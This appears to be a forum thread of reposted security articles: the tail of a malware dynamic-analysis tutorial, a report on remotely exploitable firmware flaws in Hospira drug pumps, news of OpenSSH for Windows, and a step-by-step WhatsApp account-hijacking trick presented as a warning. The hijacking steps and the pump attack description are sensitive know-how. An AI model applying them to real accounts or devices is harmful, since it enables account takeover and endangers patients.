Since there is always a huge number of calls being made in the Windows OS, it is sometimes impractical to discover important events. Process Monitor helps with this through a filter tab in which we can filter by the type of call. For example, see the screenshot below. It shows that I have applied a filter with the operations “WriteFile” and “RegSetValue”. These are usually the calls made by a malicious executable to write a file onto the disk and to make registry changes. After applying the filter, we get the following list of events in Process Monitor. The most important are the top two entries, which show the execution of the file and the creation of a registry entry with a new entry named “Video Driver.” Other entries can be ignored, as it is usual for pseudorandom numbers to be generated. On clicking the first entry, we can even see what action that call has made. As is clear from the screenshot below, a total of 7168 bytes have been written to the file system by this binary.

Analyzing with Process Explorer

Process Explorer is a tool used for performing dynamic analysis and can give you great insight into the processes currently running on the system. Below is an example of the process being created after running a binary. Clicking on a process can help you reveal whether the process has created any mutant or not. Also it can give you all the information about the DLLs being used by the process. Below, the screenshot shows that the process uses ws2_32.dll, which means that a network connection will be made by this process. Double clicking a particular process will yield more information about the process. Some of the important attributes are:

Verify Option. There is a verify option in every process to check whether that binary is signed by Microsoft or not. Below, the screenshot depicts that this binary is not signed by Microsoft.

Threads will showcase the number of threads associated with this process.
Strings tab can help in determining whether any process replacement has occurred or not. If the two sets of strings are drastically different, then process replacement might have occurred. Below, the screenshot shows the strings in the executable both on disk and in memory.

Using INetSim

INetSim is a free Linux-based suite for simulating common Internet services. It is sometimes difficult to analyze malware without letting it completely execute its code, and that can involve contacting the outside world for services over HTTP, HTTPS, FTP etc. INetSim does exactly this by emulating services like HTTP, HTTPS and FTP and allows the analyst to analyze the behaviour of the malware. Since this is Linux-based, the best way to use it is to install it on a Linux machine and keep it in the same network as the Windows testing machine. INetSim can serve any type of request that the malware might make. For example, suppose a malware requests an image for its code to execute. INetSim can fulfil the request of the malware; though the image will not be what the malware is looking for, it will keep the malware executing its code. INetSim can also log all the requests from the client regardless of the port. This can be used to record all the data sent by the malware.

In the next series, we will move to advanced techniques of malware analysis using both static and dynamic analysis.

Source
  23. WHEN SECURITY RESEARCHER Billy Rios reported earlier this year that he’d found vulnerabilities in a popular drug infusion pump that would allow a hacker to raise the dosage limit on medication delivered to patients, there was little cause for concern. Altering the allowable limits of a particular drug simply meant that if a caregiver accidentally instructed the pump to give too high or too low a dosage, the pump wouldn’t issue an alert. This seemed much less alarming than if the pumps had vulnerabilities that would allow a hacker to actually alter the dosage itself. Now Rios says he’s found the more serious vulnerabilities in several models of pumps made by the same manufacturer, which would allow a hacker to surreptitiously and remotely change the amount of drugs administered to a patient. “This is the first time we know we can change the dosage,” Rios told WIRED. The vulnerabilities are known to affect at least five models of drug infusion pumps made by Hospira—an Illinois firm with more than 400,000 intravenous drug pumps installed in hospitals around the world. The vulnerable models include the company’s standard PCA LifeCare pumps; its PCA3 LifeCare and PCA5 LifeCare pumps; its Symbiq line of pumps, which Hospira stopped selling in 2013 due to concerns raised by the FDA over other quality and safety issues with the pumps; and its Plum A+ model of pumps. Hospira has at least 325,000 of the latter model alone installed in hospitals worldwide. These are the systems that Rios knows are vulnerable because he’s tested them. But he suspects that the company’s Plum A+3 and its Sapphire and SapphirePlus models are equally vulnerable too. Hospira did not respond to a request for comment. Earlier this year, Rios went public with information about a different security issue with Hospira’s LifeCare pumps. This one involved drug libraries used with the pumps, which help set upper and lower boundaries for dosages of intravenous drugs a pump can safely administer. 
Because the libraries don’t require authentication, Rios found that anyone on the hospital’s network—including patients in the hospital or a hacker accessing the pumps over the Internet—can load a new drug library that alters the limits for a drug. At the time he publicly disclosed the library vulnerability, Rios told WIRED that he had not yet found any vulnerabilities that would allow him to actually alter a drug dosage, though he was working on it. But he now acknowledges that he had found these more serious vulnerabilities in the LifeCare pumps at the time and had in fact reported them to Hospira and the FDA last year. At the time he hadn’t yet tested a Plum A+ pump, however. The new vulnerabilities would allow attackers to remotely alter the firmware on the pumps, giving them complete control of the devices and the ability to alter dosages delivered to patients. And because the pumps are also vulnerable to the previous library vulnerability he disclosed, an attacker would be able to first raise the dosage above the maximum limit before delivering a potentially deadly dosage without the pump issuing an alert. How the Firmware Security Flaw Works The problem lies with a communication module in the LifeCare and Plum A+ pumps. Hospitals use the communication modules to update the libraries on the pumps. But the communication modules are connected via a serial cable to a circuit board in the pumps, which contains the firmware. Hospira uses this serial connection to remotely access the firmware and update it. But hackers can use it for the same purpose. The serial connection would be less of a concern if Hospira’s pumps accepted only legitimate firmware updates that were authenticated and digitally signed. But Rios says they’ll accept any update, which means anyone can alter the software on the pumps. “And if you can update the firmware on the main board, you can make the pump do whatever you like,” Rios says. 
A hacker could not only change the dosage of drugs delivered to a patient but also alter the pump’s display screen to indicate a safe dosage was being delivered. The compromise of the communication module and serial cable doesn’t automatically mean a compromise of the pump. An attacker needs to know how to perform a firmware update. But Rios says it didn’t take him long to figure it out. Hospira Denied Problem With Pumps Rios says when he first told Hospira a year ago that hackers could update the firmware on its pumps, the company “didn’t believe it could be done.” Hospira insisted there was “separation” between the communications module and the circuit board that would make this impossible. Rios says technically there is physical separation between the two. But the serial cable provides a bridge to jump from one to the other. “From an architecture standpoint, it looks like these two modules are separated,” he says. “But when you open the device up, you can see they’re actually connected with a serial cable, and they’re connected in a way that you can actually change the core software on the pump.” An attacker wouldn’t need physical access to the pump. The communication modules are connected to hospital networks, which are in turn connected to the Internet. “You can talk to that communication module over the network or over a wireless network,” Rios warns. Hospira knows this, he says, because this is how it delivers firmware updates to its pumps. Yet despite this, he says, the company insists that “the separation makes it so you can’t hurt someone. So we’re going to develop a proof-of-concept that proves that’s not true.” He plans to demonstrate a proof-of-concept attack next month at the SummerCon security conference in Brooklyn, New York. 
Rios says when he warned Hospira a year ago about the firmware problem in its LifeCare pumps, he advised the company to perform what’s called a variant analysis to determine if its other models of pumps were affected as well, but the company refused, saying the problem was confined to the LifeCare line. To prove Hospira wrong, Rios purchased and tested one of the company’s Plum A+ drug pumps and found that it had the same firmware issue. Last month, the FDA issued an alert about the firmware issue, but only in reference to Hospira’s LifeCare PCA3 and PCA5 pumps. The alert didn’t mention the other models, which could lead hospitals to believe they don’t have a security risk. Rios contacted the FDA last week to tell the agency that the vulnerability extended to Hospira’s Plum A+ line as well, but he says the federal agency asked him to withhold the finding from the public until Hospira had time to verify the issue. But Rios declined, saying Hospira had already had a year to test the Plum A+ pumps and determine if the problem extended to them, but had declined to do so. He said hospitals needed to know now that the pumps are putting patients at risk. The FDA did not respond to a request for comment. Rios is planning to obtain models from Hospira’s Sapphire line of pumps as well to prove that they’re equally vulnerable to the issue. Source
  24. Until now, Unix and Linux system administrators had to download third-party SSH client software like PuTTY on their Windows machines to securely manage their machines and servers remotely through the Secure Shell protocol (better known as SSH). This has always been an awkward feature of the Windows platform, as it lacks both a native SSH client for connecting to Linux machines and an SSH server to support inbound connections from Linux machines. But… Believe it or not: you won't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring the OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to the OpenSSH community in an effort to deliver better SSH support in PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transfer and network port forwarding. This is not the first time Microsoft has planned to adopt SSH for its Windows platform; the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will share more information on when users can expect SSH support shortly. Source
  25. The hugely popular smartphone messaging service WhatsApp, acquired by Facebook for over $20 billion last year, has reportedly been found to be prone to hijacking without unlocking or knowing your device password, making its hundreds of millions of users vulnerable to not just hackers, but also non-technical people. This trick lets anyone around you effectively take control of your WhatsApp account. The attacker needs nothing more than the phone number of the target person and access to the target's mobile phone for a few seconds, even if it is locked. Hacking a WhatsApp account in such a scenario is not hard for your friends and colleagues. This is not actually a loophole or vulnerability in WhatsApp; rather, it is just the way WhatsApp is designed and the way its account setup mechanism works.

NOTE: Moreover, we aren’t encouraging users to hack others' WhatsApp accounts; the purpose of publishing this article is to warn and remind our readers that you should be extra careful to whom you lend your mobile phone and not to leave it unattended for longer durations with strangers around.

The trick enables the offender to get full control over the victim’s WhatsApp account in no time, and the most surprising part is that it works independently on all mobile platforms, including Android, Windows and Apple’s iOS.

Here’s How to Hijack Someone Else’s WhatsApp Account

Below are the clear steps to hack a WhatsApp account on any smartphone:

Begin by setting up a WhatsApp account on a new mobile phone using the phone number of your target.

During the setup process, WhatsApp will call the target’s phone number and will provide a PIN that needs to be entered for the authentication of the account.

If you already have access to the victim’s phone, you can just answer the phone call and grab the code with no effort. Even if the victim has a lock screen enabled on the phone, you can receive the phone call to get the secret PIN.

Using this known and simple trick, your colleagues can hijack your WhatsApp account easily.

The worst case is with iPhones: things get even worse on iPhone if the user has configured their iPhone with Siri authentication for the lock screen, because all the contact details are available through Siri’s settings, effectively giving everyone access to their phone number without the need for a PIN. Thus, if you try to steal the WhatsApp account information without even having the phone number of the target user, you can just call your number from the target’s phone using Siri.

Just check the video demonstration given below, which explains the simple trick of taking control of anyone’s WhatsApp account.

Source